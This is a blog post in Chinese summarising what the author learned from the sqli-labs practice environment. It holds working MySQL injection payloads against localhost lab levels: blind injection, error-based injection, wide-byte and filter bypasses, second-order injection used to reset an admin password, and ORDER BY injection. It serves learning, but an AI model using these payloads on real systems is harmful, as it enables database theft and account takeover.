<!DOCTYPE html>
<html lang=zh-CN>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta property="og:description" content="">
    <meta property="og:type" content="website">
    <meta name="description" content="">
    <meta name="keyword"  content="">
    <link rel="shortcut icon" href="/img/favicon.ico">

    <title>
        
        sqli-lab学习心得总结 - LH&#39;s blog
        
    </title>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/aircloud.css">

    
<link rel="stylesheet" href="/css/gitment.css">

    <!--<link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">-->
    <link href="//at.alicdn.com/t/font_620856_28hi1hpxx24.css" rel="stylesheet" type="text/css">
    <!-- ga & ba script hoook -->
    <script></script>

    









<meta name="generator" content="Hexo 6.3.0"></head>

<body>

<div class="site-nav-toggle" id="site-nav-toggle">
    <button>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
        <span class="btn-bar"></span>
    </button>
</div>

<div class="index-about">
    <i> 常记常新 </i>
</div>

<div class="index-container">
    
    <div class="index-left">
        
<div class="nav" id="nav">
    <div class="avatar-name">
        <div class="avatar radius">
            <img src="/img/avatar.jpg" />
        </div>
        <div class="name">
            <i>LH</i>
        </div>
    </div>
    <div class="contents" id="nav-content">
        <ul>
            <li >
                <a href="/">
                    <i class="iconfont icon-shouye1"></i>
                    <span>主页</span>
                </a>
            </li>
            <li >
                <a href="/tags">
                    <i class="iconfont icon-biaoqian1"></i>
                    <span>标签</span>
                </a>
            </li>
            <li >
                <a href="/archives">
                    <i class="iconfont icon-guidang2"></i>
                    <span>存档</span>
                </a>
            </li>
            <li >
                <a href="/collect/">
                    <i class="iconfont icon-shoucang1"></i>
                    <span>收藏</span>
                </a>
            </li>
            <li >
                <a href="/about/">
                    <i class="iconfont icon-guanyu2"></i>
                    <span>关于</span>
                </a>
            </li>
            
            <li>
                <a id="search">
                    <i class="iconfont icon-sousuo1"></i>
                    <span>搜索</span>
                </a>
            </li>
            
        </ul>
    </div>
    
        <div id="toc" class="toc-article">
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x00"><span class="toc-text">0x00</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-%E6%B3%A8%E5%85%A5%E6%AD%A5%E9%AA%A4"><span class="toc-text">0x01 注入步骤</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-%E7%9B%B2%E6%B3%A8%E6%8A%80%E5%B7%A7"><span class="toc-text">0x02 盲注技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#BoolenBased"><span class="toc-text">BoolenBased</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#TimeBased"><span class="toc-text">TimeBased</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-%E5%8F%8C%E6%9F%A5%E8%AF%A2"><span class="toc-text">0x03 双查询</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%8F%8C%E6%9F%A5%E8%AF%A2%E4%BD%BF%E7%94%A8%E7%9A%84%E5%9B%9B%E4%B8%AA%E5%87%BD%E6%95%B0"><span class="toc-text">双查询使用的四个函数</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-%E5%85%B6%E4%BB%96%E5%9F%BA%E4%BA%8E%E6%8A%A5%E9%94%99%E7%9A%84%E6%B3%A8%E5%85%A5%E5%87%BD%E6%95%B0"><span class="toc-text">0x04 其他基于报错的注入函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7"><span class="toc-text">0x05 绕过技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="toc-text">宽字节注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#or-x2F-and-%E7%BB%95%E8%BF%87"><span class="toc-text">or&#x2F;and 绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%A9%BA%E6%A0%BC%E7%BB%95%E8%BF%87"><span class="toc-text">空格绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="toc-text">二次注入</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-ORDERBY%E4%BB%8E%E5%8F%A5%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7"><span class="toc-text">0x06 ORDERBY从句注入技巧</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AE%80%E5%8D%95%E5%88%A4%E6%96%AD"><span class="toc-text">简单判断</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%9F%BA%E4%BA%8E%E6%8A%A5%E9%94%99"><span class="toc-text">基于报错</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%9B%B2%E6%B3%A8"><span class="toc-text">盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#BoolenBased-1"><span class="toc-text">BoolenBased</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#TimeBased-1"><span class="toc-text">TimeBased</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Refer"><span class="toc-text">Refer:</span></a></li></ol>
</div>
    
</div>


<div class="search-field" id="search-field">
    <div class="search-bg" id="search-bg"></div>
    <div class="search-container">
        <div class="search-input">
            <span id="esc-search"> <i class="icon-fanhui iconfont"></i></span>
            <input id="search-input"/>
            <span id="begin-search">搜索</span>
        </div>
        <div class="search-result-container" id="search-result-container">

        </div>
    </div>
</div>

        <div class="index-about-mobile">
            <i> 常记常新 </i>
        </div>
    </div>
    
    <div class="index-middle">
        <!-- Main Content -->
        


<div class="post-container">
    <div class="post-title">
        sqli-lab学习心得总结
    </div>

    <div class="post-meta">
        <span class="attr">发布于：<span>2017-12-10 09:53:22</span></span>
        
        <span class="attr">标签：/
        
        <a class="tag" href="/tags/#web安全" title="web安全">web安全</a>
        <span>/</span>
        
        
        </span>
        <span class="attr">访问：<span id="busuanzi_value_page_pv"></span>
</span>
</span>
    </div>
    <div class="post-content no-indent">
        <h2 id="0x00"><a href="#0x00" class="headerlink" title="0x00"></a>0x00</h2><p>从sqli-lab入门Mysql注入。总结记录下我学到的知识点。</p>
<h2 id="0x01-注入步骤"><a href="#0x01-注入步骤" class="headerlink" title="0x01 注入步骤"></a>0x01 注入步骤</h2><ul>
<li>查看当前的用户名，数据库和版本号。user(),datebase(),version()</li>
<li>从<code>information_schema</code>中获取数据库、数据表的信息。</li>
<li>拖库或传Shell</li>
</ul>
<h2 id="0x02-盲注技巧"><a href="#0x02-盲注技巧" class="headerlink" title="0x02 盲注技巧"></a>0x02 盲注技巧</h2><h3 id="BoolenBased"><a href="#BoolenBased" class="headerlink" title="BoolenBased"></a>BoolenBased</h3><p><em>当参数传递正确或错误时页面的返回结果不同时，可以用这种方法。速度比TimeBased快很多。</em></p>
<p>payload:<code>ascii(substr((select database()),1,1))&gt;64</code></p>
<p><code>if(a,b,c)</code>：a为条件，a为true，返回b，否则返回c，如if(1&gt;2,1,0),返回0。<code>substr()</code>截取字符串，第一个参数截取字符串，第二个参数是起始位置，第三个参数是截取长度。每次查询一位，根据返回的结果判断查询条件，利用二分法查询。</p>
<p><code>substr(str,pos,len)</code>：str从pos位置开始截取len长度的字符进行返回.。注意这里的pos位置是从1开始的，不是数组的0开始</p>
<h3 id="TimeBased"><a href="#TimeBased" class="headerlink" title="TimeBased"></a>TimeBased</h3><p><em>当参数传递正确或错误时页面的返回结果相同时，可以用这种方法。速度比TimeBased快很多。</em></p>
<p>payload:<code>SLEEP(time)</code>、<code>BENCHMARK(count, expr)</code></p>
<p><code>SLEEP(time)</code>使程序等待time秒，<code>BENCHMARK（count,expr）</code>执行expr指令count次。这两个函数可以用来结合if()、ascii()、substr()等函数可以构造时间注入。</p>
<h2 id="0x03-双查询"><a href="#0x03-双查询" class="headerlink" title="0x03 双查询"></a>0x03 双查询</h2><p><em>适用于基于报错的某些情况下,联合查询不会直接回显查询结果时，我们可以利用双查询，把想要的信息通过报错返回。 &#x2F;&#x2F;如Less-6</em></p>
<h4 id="双查询使用的四个函数"><a href="#双查询使用的四个函数" class="headerlink" title="双查询使用的四个函数"></a>双查询使用的四个函数</h4><ul>
<li>Rand() &#x2F;&#x2F;随机函数</li>
<li>Floor() &#x2F;&#x2F;取整函数</li>
<li>Count() &#x2F;&#x2F;汇总函数</li>
<li>Group by clause &#x2F;&#x2F;分组函数</li>
</ul>
<p>payload:<code>select count(*), concat((select version()), floor(rand()*2))as a from information_schema.tables group by a;</code></p>
<p>当在一个聚合函数，比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。</p>
<p>以Less-6举例</p>
<p>源码：</p>
<p><img src="/img/sql/err.png"></p>
<p>payload:</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-6/?id=0%22%20union%20select%201,count(*),%20concat(%27%5C~%27,(select%20user()),%27%5C~%27,%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+">http://localhost/Less-6/?id=0%22%20union%20select%201,count(*),%20concat(%27\~%27,(select%20user()),%27\~%27,%20floor(rand()*2))as%20a%20from%20information_schema.tables%20group%20by%20a--+</a></p>
</blockquote>
<p>result：</p>
<p><img src="/img/sql/err1.png"></p>
<p>在payload加入<code>concat()</code>是为了便于区分，同时避免有些时候返回结果显示不完全的情况。</p>
<h2 id="0x04-其他基于报错的注入函数"><a href="#0x04-其他基于报错的注入函数" class="headerlink" title="0x04 其他基于报错的注入函数"></a>0x04 其他基于报错的注入函数</h2><p><em>适用情况跟双查询相同</em></p>
<p>payload:<code>updatexml()</code>&#x2F;<code>extractvalue()</code></p>
<p><code>UPDATEXML (XML_document, XPath_string, new_value);</code></p>
<ul>
<li>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc</li>
<li>第二个参数：XPath_string (Xpath格式的字符串)</li>
<li>第三个参数：new_value，String格式，替换查找到的符合条件的数据</li>
<li>作用：改变文档中符合条件的节点的值</li>
</ul>
<p><code>extractvalue()</code>和前者类似。</p>
<p>同以Less-6举例</p>
<p>payload：</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-6/?id=0%22%20or%20updatexml(1,concat(%22:%22,version(),1),1)%20--+">http://localhost/Less-6/?id=0%22%20or%20updatexml(1,concat(%22:%22,version(),1),1)%20--+</a></p>
</blockquote>
<p>result：</p>
<p><img src="/img/sql/err2.png"></p>
<h2 id="0x05-绕过技巧"><a href="#0x05-绕过技巧" class="headerlink" title="0x05 绕过技巧"></a>0x05 绕过技巧</h2><h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p><em>对于那些使用gbk编码的页面，当源码对输入进行加斜杆的转义时,可以使用宽字节注入绕过。</em></p>
<p>以Less-33举例：</p>
<p>参数被addslashes函数转义。</p>
<p>payload:</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-32/?id=0%EF%BF%BD%27%20union%20select%201,2,3%20--+">http://localhost/Less-32/?id=0%df%27%20union%20select%201,2,3%20--+</a></p>
</blockquote>
<p>由于mysql的特性，因为gbk是多字节编码，他认为两个字节代表一个汉字，所以%df和后面的\也就是%5c变成了一个汉字“運”，而’逃逸了出来。</p>
<h3 id="or-x2F-and-绕过"><a href="#or-x2F-and-绕过" class="headerlink" title="or&#x2F;and 绕过"></a>or&#x2F;and 绕过</h3><ul>
<li><code>||</code>&#x3D;or,<code>&amp;&amp;</code>&#x3D;and</li>
<li>双写绕过，如oorr\aandnd</li>
</ul>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><ul>
<li>&#x2F; **&#x2F;绕过</li>
<li>%a0绕过</li>
</ul>
<p>%a0绕过原理：在进行正则匹配时，匹配到它时是识别为中文字符的，所以不会被过滤掉，但是在进入SQL语句后，Mysql是不认中文字符的，所以直接当作空格处理，就这样，我们便达成了Bypass的目的，成功绕过空格+注释的过滤</p>
<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p><em>利用源码的逻辑错误注入</em></p>
<p>以Less-24举例</p>
<p>源码：</p>
<p><img src="/img/sql/two.png"></p>
<p>一个登录系统，在注册、登陆等环节都使用了<code>mysql_real_escape_string</code>函数转义，但是在如图所示的更改密码时没有检测username,我们可以利用这个逻辑错误修改一些可能存在的常见用户名（如admin、root）的密码。</p>
<p>以修改admin用户密码举例，注册一个用户</p>
<blockquote>
<p>username：admin’ –+</p>
<p>password: 123</p>
</blockquote>
<p>它在php里会被转义，但是存进数据库时还是原始值</p>
<p><img src="/img/sql/user1.png"></p>
<p>然后修改密码</p>
<p><img src="/img/sql/user2.png"></p>
<h2 id="0x06-ORDERBY从句注入技巧"><a href="#0x06-ORDERBY从句注入技巧" class="headerlink" title="0x06 ORDERBY从句注入技巧"></a>0x06 ORDERBY从句注入技巧</h2><p>orderby注入有独特的判断方法。注入的思路和之前区别不大，但是一些函数使用上有些区别。</p>
<p>以Less-46举例</p>
<p>源码：</p>
<p><img src="/img/sql/order1.png"></p>
<h3 id="简单判断"><a href="#简单判断" class="headerlink" title="简单判断"></a>简单判断</h3><p>paylaod:</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-46/?sort=1%27%20or%201=1%20--+">http://localhost/Less-46/?sort=1%27%20or%201=1%20--+</a></p>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-46/?sort=1%20%20or%201=1%20--+">http://localhost/Less-46/?sort=1%20%20or%201=1%20--+</a></p>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-46/?sort=1%20%20desc">http://localhost/Less-46/?sort=1%20%20desc</a></p>
</blockquote>
<p><code>desc</code>&#x2F;<code>asc</code>观察回显的顺序，判断是否有orderby从句的注入点</p>
<h3 id="基于报错"><a href="#基于报错" class="headerlink" title="基于报错"></a>基于报错</h3><p>payload:</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-46/?sort=1%20or%20%20updatexml(1,concat(0x2829,version()),1)%20--+">http://localhost/Less-46/?sort=1%20or%20%20updatexml(1,concat(0x2829,version()),1)%20--+</a></p>
</blockquote>
<h3 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h3><h4 id="BoolenBased-1"><a href="#BoolenBased-1" class="headerlink" title="BoolenBased"></a>BoolenBased</h4><blockquote>
<p><a target="_blank" rel="noopener" href="http://localhost/Less-46/?sort=(select+1+regexp+if(substring(database(),1,1)=0x73,1,0x00">http://localhost/Less-46/?sort=(select+1+regexp+if(substring(database(),1,1)=0x73,1,0x00</a></p>
</blockquote>
<p><code>regexp</code>正则匹配函数</p>
<p>1与if语句正则匹配，database()第一个字符&#x3D;0x73为真则if为1，则regexp匹配结果为1，否则为0。</p>
<h4 id="TimeBased-1"><a href="#TimeBased-1" class="headerlink" title="TimeBased"></a>TimeBased</h4><blockquote>
<p>5,1,(SELECT(1)FROM(SELECT(SLEEP(2)))test))</p>
</blockquote>
<h2 id="Refer"><a href="#Refer" class="headerlink" title="Refer:"></a>Refer:</h2><ul>
<li><a target="_blank" rel="noopener" href="https://www.2cto.com/article/201303/192718.html" title="双查询">双查询</a></li>
<li><a target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/mutibyte-sql-inject.html" title="宽字节注入">宽字节注入</a></li>
<li><a target="_blank" rel="noopener" href="https://www.secpulse.com/archives/57197.html" title="orderby从句注入">orderby从句注入</a></li>
</ul>

        
        <br />
        <div id="comment-container">
        </div>
        <div id="disqus_thread"></div>
        <div id="lv-container"></div>
        <div class="giscus"></div>
    </div>
</div>

    </div>
</div>


<footer class="footer">
    <ul class="list-inline text-center">
        
        

        

        

        

        

    </ul>
    
    <p>
        <span id="busuanzi_container_site_pv">
            <span id="busuanzi_value_site_pv"></span>PV
        </span>
        <span id="busuanzi_container_site_uv">
            <span id="busuanzi_value_site_uv"></span>UV
        </span>
        Created By <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a>  Theme <a target="_blank" rel="noopener" href="https://github.com/aircloud/hexo-theme-aircloud">AirCloud</a></p>
</footer>




</body>

<script>
    // We expose some of the variables needed by the front end
    window.hexo_search_path = "search.xml"
    window.hexo_root = "/"
    window.isPost = true
</script>
<script src="https://cdn.bootcss.com/jquery/3.3.1/jquery.min.js"></script>

<script src="/js/index.js"></script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>




    <script src="https://giscus.app/client.js"
    data-repo="YYHYlh/YYHYlh.github.io"
    data-repo-id="R_kgDOJjKWvw"
    data-category="Announcements"
    data-category-id="DIC_kwDOJjKWv84CWs3N"
    data-mapping="pathname"
    data-strict="0"
    data-reactions-enabled="1"
    data-emit-metadata="0"
    data-input-position="bottom"
    data-theme="preferred_color_scheme"
    data-lang="zh-CN"
    crossorigin="anonymous"
    async>
</script>




</html>
